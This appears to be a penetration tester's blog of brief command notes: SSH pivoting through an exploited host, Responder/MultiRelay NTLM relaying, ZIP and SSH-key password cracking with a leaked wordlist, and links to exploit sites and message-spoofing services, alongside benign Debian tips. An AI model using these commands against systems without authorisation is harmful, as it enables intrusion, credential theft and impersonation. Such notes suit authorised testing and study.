Categorieën
Uncategorized

Port Forwarding

Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host

ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117

Use Proxychain to route traffic through exploited host

ssh -D 127.0.0.1:1090 msx@192.168.68.117

Usage example nmap scan

proxychains nmap -sT -v 10.10.20.140
Categorieën
Debian Uncategorized

Debian Tips

How to list all services in Debian

If you want to view the entire services running in the Debian 10, you can run the following command.

ls /etc/init.d

If you want to get a more detailed list of all services and processes running in your Debian operating system, execute the following command.

Systemctl list-unit-files

How to check the status of a particular service using init.d

There are several ways to check the status of a particular service whether it is running or not. One of such methods is by using init.d. You can execute the command with root privileges having following syntax,

/etc/init.d/{servicename} status

Let’s check the status of the networking service. The complete command should look like the following,

/etc/init.d/networking status

How to stop, start and restart a particular service

There are two methods of stopping and starting a particular service. I will list here both of the methods.

Start and stop a service using init.d

Let me start by stopping the already running networking service to show you how to stop any service with the help of init.d. Execute the following command with root privileges,

/etc/init.d/networking stop

Print route

route -n
Categorieën
Responder Uncategorized

Responder

1. Run RunFinger.py -i<target IP> against target

2. Modify the Responder.confconfiguration file and disable the “SMB” server and “HTTP” server options by setting the values to “Off”.

3.python Responder.py -I eth0 –lm

4. python MultiRelay.py -t <target IP> –u ALL

 

Categorieën
Uncategorized ZIP crack

ZIP crack

fcrackzip -D -p /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt XXX.zip

Categorieën
Uncategorized Windows Tricks

Windows Tricks

Categorieën
Time Uncategorized

TIME

net time -S IP -U “”

date -s time

rdate -n ip

Categorieën
TCPDUMP Uncategorized

TCPDUMP

tcpdump -i tun0 icmp (for protocol filter)

Categorieën
Steno Uncategorized

Steno

Look at picture for content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png
Categorieën
SSH Uncategorized

SSH

Use SSH private key

.priv

chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Extract Password from id_rsa key

python /usr/share/john/ssh2john.py id_rsa > test

john –wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test

Categorieën
Sites Uncategorized

Interesting Sites

Recon / Enumeration

http://www.lifeoverpentest.com/ https://backdoorshell.gitbooks.io/oscp-useful-links/ https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/ https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.thegeekstuff.com/2010/07/execute-shell-script/ https://hashes.org/ https://github.com/blackploit/hash-identifier.git

Exploits

https://nvd.nist.gov/vuln/search https://www.exploit-db.com/ https://packetstormsecurity.com/ https://www.securityfocus.com/vulnerabilities https://0day.tday http://mvfjfugdwgc5uwho.onion/

Social engineering

https://www.spoofmytextmessage.com/ https://www.spoofmyemail.com/

https://goo.gl tinyurl.com